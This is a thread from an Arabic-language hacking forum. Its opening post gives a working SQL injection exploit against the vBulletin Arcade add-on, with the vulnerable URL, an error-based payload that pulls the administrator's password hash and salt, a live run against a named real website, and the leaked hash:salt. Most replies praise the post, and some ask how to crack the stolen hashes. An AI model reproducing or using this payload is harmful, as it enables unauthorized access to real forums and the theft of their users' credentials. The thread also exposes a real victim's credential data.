1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : mafia | المشاهدات : 3,862 | الردود : 24
حالة الموضوع:
مغلق
  1. mafia Developer

    الأنتساب:
    ‏23 مارس 2013
    المشاركات:
    1
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    نظام التشغيل:
    Linux
    [​IMG]
    السلام عليكم ورحمة الله وبركاته

    مابي اطول الموضوع مثل ماهو واضح ثغرة في جميع الاصدارات التي تحمل ملف Arcade

    الملف المصاب
    :

    كود PHP:
    /arcade.php?act=Arcade&do=stats&comment=a&s_id=


    الاستغلال :

    كود PHP:
    /arcade.php?act=Arcade&do=stats&comment=a&s_id=AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT CONCAT(password,0x3a,saltFROM user WHERE id 1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)


    تجربة لعيون الشباب !!:{

    كود PHP:
    http://www.christianteenforums.com/arcade.php?act=Arcade&do=stats&comment=a&s_id=1%20AND%20%28SELECT%201%20FROM%20%28SELECT%20COUNT%28*%29,CONCAT%28%28SELECT%20CONCAT%28password,0x3a,salt%29%20FROM%20user%20WHERE%20id%20=%201%29,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29


    النتائج :

    كود PHP:
    mySQL query errorUPDATE games_scores SET comment='a' WHERE s_id=AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT CONCAT(password,0x3a,saltFROM user WHERE userid 1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    mySQL errorDuplicate entry '839fbf5ab99638a9b389971e74ef93c0:kXdYHA3-s(@\Ukrq-pY}RZ{Y5bn}zZ1' for key 'group_key'
    mySQL error code
    DateFriday 22nd 2013f March 2013 10:58:51 PM


    هذا الهاش للادمن والسالت bl"eh"

    '839fbf5ab99638a9b389971e74ef93c0:kXdYHA3-s(@\Ukrq-pY}RZ{Y5bn}zZ1'

    دوك الثغرة :

    كود PHP:
    /arcade.php?act=Arcade Powered by vBulletin



    صورة توضيحية للثغرة

    [​IMG]


    GooD Luck
     
  2. روبورت1 <img src="http://im34.gulfup.com/s2o63.gif"><br>فر

    الأنتساب:
    ‏8 نوفمبر 2012
    المشاركات:
    654
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    50
    عزيزي الكاتب ، شكراً لك على الإفادة في المنتدى بإضافة مادّة علمية جديدة إليه
    كتب الله لك أجر كل من استفاد منها.

    * تنبيه للأعضاء والزوّار ، نتمنّى عدم دخول أيّة روابط خارجيّة أو تحميل أي مرفق موجود بالموضوع
    حتى يتم تأكيد سلامة المحتوى برد من قبل أحد أعضاء فريق الفحص أو مشرف القسم.

    هذه العضوية آليّة ، غير مُدارة من قبل أي عُنصر بشري ، إنما مبرمجة لتقوم ببعض أعمال التنظيم والمتابعة في المنتدى.

     
  3. яднїм Developer

    الأنتساب:
    ‏2 يونيو 2012
    المشاركات:
    55
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    30
    الوظيفة:
    ҢαƆк
    الإقامة:
    ♥IǾ-T34M♥
    رد: كسر البرايفت وتطويف 0day ثغرة في جميع اصدارات vBulletin

    مبدع ,,

    الله يوفقك,,

    شكرا ً لكـ,,

    لا تحرمنا من جديدكـ
    &:":​
     
  4. Abdullah Developer

    الأنتساب:
    ‏30 مارس 2012
    المشاركات:
    44
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    30
    الوظيفة:
    مصمم
    نظام التشغيل:
    windows 7
    رد: كسر البرايفت وتطويف 0day ثغرة في جميع اصدارات vBulletin

    يعطيــــــi:q^:ـــــــك الـــــــف عافيـــــ:{1}:ــــــة
    مبدع حبيبي
    :{17}:​
     
  5. AHMAD MOSAAD Developer

    الأنتساب:
    ‏31 مارس 2012
    المشاركات:
    89
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    الوظيفة:
    Student
    الإقامة:
    Egypt
    رد: كسر البرايفت وتطويف 0day ثغرة في جميع اصدارات vBulletin

    شكرن​
     
  6. Scorpion Developer

    الأنتساب:
    ‏15 يونيو 2012
    المشاركات:
    55
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    30
    الإقامة:
    DZ
    نظام التشغيل:
    Linux
    رد: كسر البرايفت وتطويف 0day ثغرة في جميع اصدارات vBulletin

    بارك الله فيك
    .
    .
    يستفيدون منها الاعضاء
    &:":​
     
  7. M.A.F. Developer

    الأنتساب:
    ‏26 فبراير 2013
    المشاركات:
    5
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    رد: كسر البرايفت وتطويف 0day ثغرة في جميع اصدارات vBulletin

    جزاك الله خيرا ً على الثغرة ، شغالة تمام التمام و لكن للأسف فك تشفير هاش المنتديات صعب للغاية ، يعني أنا حصلت على أكثر من هاش من قبل و لم أستطع فكه ، يا ريت لو تفيدنا بموقع يفك الهاش بسهولة :)
     
  8. عراقي انا Developer

    الأنتساب:
    ‏22 ديسمبر 2012
    المشاركات:
    37
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    30
    الإقامة:
    العراق
    رد: كسر البرايفت وتطويف 0day ثغرة في جميع اصدارات vBulletin

    صاحب الموضوع بارك الله فيك اخي العزيز على الموضوع


    هههههههه هنا المشاكل بالهاشات واكثر المواقع تخمين موناجح تنفع مع الهاشات السهله
    &:"
     
  9. SN!p3r_GS Developer

    الأنتساب:
    ‏11 سبتمبر 2012
    المشاركات:
    7
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    الإقامة:
    PC
    رد: كسر البرايفت وتطويف 0day ثغرة في جميع اصدارات vBulletin

    معروفه ومافي تطوير


    واسهل شي فك الهاشات مااعرف شنو الصعوبه i:q4^:​
     
  10. Life Developer

    الأنتساب:
    ‏31 يوليو 2012
    المشاركات:
    55
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    الإقامة:
    k.s.a
    رد: كسر البرايفت وتطويف 0day ثغرة في جميع اصدارات vBulletin

    يانجم ياريت تفيدنا بكسر الهاشات ونكون شاكرين لك &:"

     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة